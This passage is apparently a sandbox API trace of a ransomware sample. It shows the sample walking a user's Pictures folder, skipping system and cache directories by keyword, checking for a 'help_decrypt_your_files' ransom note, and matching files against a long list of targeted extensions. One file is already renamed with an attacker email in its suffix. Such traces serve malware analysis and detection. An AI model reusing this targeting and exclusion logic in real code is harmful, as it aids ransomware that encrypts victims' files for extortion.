	[0196.589] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0196.590] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*") returned 34
	[0196.590] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.590] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\*.*") returned 0x22
	[0196.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.590] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0196.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.591] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0196.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.591] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0196.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.591] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0196.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.592] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0196.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.592] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0196.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.592] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0196.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.593] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0196.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.593] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0196.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.593] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0196.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.594] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0196.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.594] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0196.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.594] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0196.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.595] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0196.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.595] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0196.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.595] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0196.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.596] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0196.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.596] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="cookies") returned 0x0
	[0196.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.596] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0196.597] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0196.597] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0196.597] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0196.597] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0196.597] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dfe3182, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8dfe3182, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e009625, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15a90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3pdcwv86.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="3PDCWV~1.SCL")) returned 1
	[0196.597] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x698fd70, ftLastAccessTime.dwHighDateTime=0x1d975cf, ftLastWriteTime.dwLowDateTime=0x698fd70, ftLastWriteTime.dwHighDateTime=0x1d975cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5KqhPE_Jl-uI", cAlternateFileName="5KQHPE~1")) returned 1
	[0196.597] lstrcmpW (lpString1="5KqhPE_Jl-uI", lpString2="..") returned 1
	[0196.597] lstrcmpW (lpString1="5KqhPE_Jl-uI", lpString2=".") returned 1
	[0196.598] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0196.598] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.598] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="5KqhPE_Jl-uI" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI"
	[0196.598] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI"
	[0196.598] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0196.598] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0196.598] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*"
	[0196.598] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x698fd70, ftLastAccessTime.dwHighDateTime=0x1d975cf, ftLastWriteTime.dwLowDateTime=0x698fd70, ftLastWriteTime.dwHighDateTime=0x1d975cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0196.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*") returned 47
	[0196.599] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.599] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*") returned 0x2f
	[0196.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.600] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="windows") returned 0x0
	[0196.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.600] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="boot") returned 0x0
	[0196.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.600] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="system volume information") returned 0x0
	[0196.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.601] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0196.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.601] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="temp") returned 0x0
	[0196.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.601] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="program files") returned 0x0
	[0196.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.602] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="program files (x86)") returned 0x0
	[0196.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.602] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="appdata") returned 0x0
	[0196.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.602] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="application data") returned 0x0
	[0196.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.603] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="winnt") returned 0x0
	[0196.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.603] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="tmp") returned 0x0
	[0196.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.603] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="cache") returned 0x0
	[0196.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.604] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="temporary internet files") returned 0x0
	[0196.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="webcache") returned 0x0
	[0196.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="inetcache") returned 0x0
	[0196.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="nvidia") returned 0x0
	[0196.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="packages") returned 0x0
	[0196.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="cookies") returned 0x0
	[0196.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="programdata") returned 0x0
	[0196.606] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x698fd70, ftLastAccessTime.dwHighDateTime=0x1d975cf, ftLastWriteTime.dwLowDateTime=0x698fd70, ftLastWriteTime.dwHighDateTime=0x1d975cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0196.607] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0267d50, ftCreationTime.dwHighDateTime=0x1d96e78, ftLastAccessTime.dwLowDateTime=0xfbc50120, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0xfbc50120, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0xceed, dwReserved0=0x0, dwReserved1=0x0, cFileName="BXtp1Ubjz_.jpg", cAlternateFileName="BXTP1U~1.JPG")) returned 1
	[0196.607] lstrcmpW (lpString1="BXtp1Ubjz_.jpg", lpString2="..") returned 1
	[0196.607] lstrcmpW (lpString1="BXtp1Ubjz_.jpg", lpString2=".") returned 1
	[0196.607] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0196.607] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="BXtp1Ubjz_.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\BXtp1Ubjz_.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\BXtp1Ubjz_.jpg"
	[0196.607] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\BXtp1Ubjz_.jpg") returned 58
	[0196.607] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.608] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\BXtp1Ubjz_.jpg", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg") returned 0x3a
	[0196.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.608] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.608] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg"
	[0196.608] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg") returned 58
	[0196.608] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.609] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0196.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.609] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.r